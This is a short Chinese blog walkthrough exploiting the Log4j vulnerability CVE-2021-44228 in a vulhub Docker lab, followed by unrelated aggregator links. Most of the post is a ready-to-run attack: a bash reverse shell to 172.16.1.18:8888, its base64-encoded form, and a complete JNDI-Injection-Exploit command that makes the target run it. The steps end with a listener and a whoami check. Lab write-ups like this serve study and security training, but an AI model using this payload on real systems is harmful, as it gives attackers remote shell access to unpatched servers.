当前位置: 首页 > news >正文

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令

2.发现端口是8983,浏览器访问http://172.16.1.18:8983/

3.用dnslog平台检测dns回显,看看有没有漏洞存在

4.反弹shell到kali(ip为172.16.1.18)的8888端口

bash -i >& /dev/tcp/172.16.1.18/8888 0>&1

然后对上述命令进行base64编码,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=

最终 Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "172.16.1.18"

同时,我们开启对172.16.1.18:8888端口监听

输入whoami命令查看是否获得shell

 

 


http://www.mrgr.cn/news/21534.html

相关文章:

  • 828华为云征文|基于Flexus云服务器X实例的应用场景-部署动态域名神器lucky
  • Openharmony 图片自适应全屏显示
  • 人工智能数据基础之线性代数入门-学习篇
  • 自我提升社团成立啦,欢迎各位同学加入~
  • 电脑驱动作用详解
  • 基于SSM+Vue+MySQL的可视化高校公寓管理系统
  • CTF 竞赛密码学方向学习路径规划
  • 心脑血管科张景龙医生:心功能不全,全面解析心脏健康的隐忧
  • 图像分割分析效果2
  • HMI设计:嵌入式设备和电脑的差异化,工控领域首选。
  • 算法设计与分析(乘船问题
  • 结构化开发方法的三种基本控制结构
  • SAP学习笔记 - 开发01 - BAPI是什么?通过界面和ABAP代码来调用BAPI
  • 多机编队—(2)Ubuntu安装Eigen OSQP OSQP-EIGEN求解器
  • 域取证的日志分析
  • QString如何格式化字符串
  • python学习
  • Mysql梳理1——数据库概述(下)
  • 优化算法与正则化
  • WPF入门到跪下 第十三章 3D绘图 - 3D绘图基础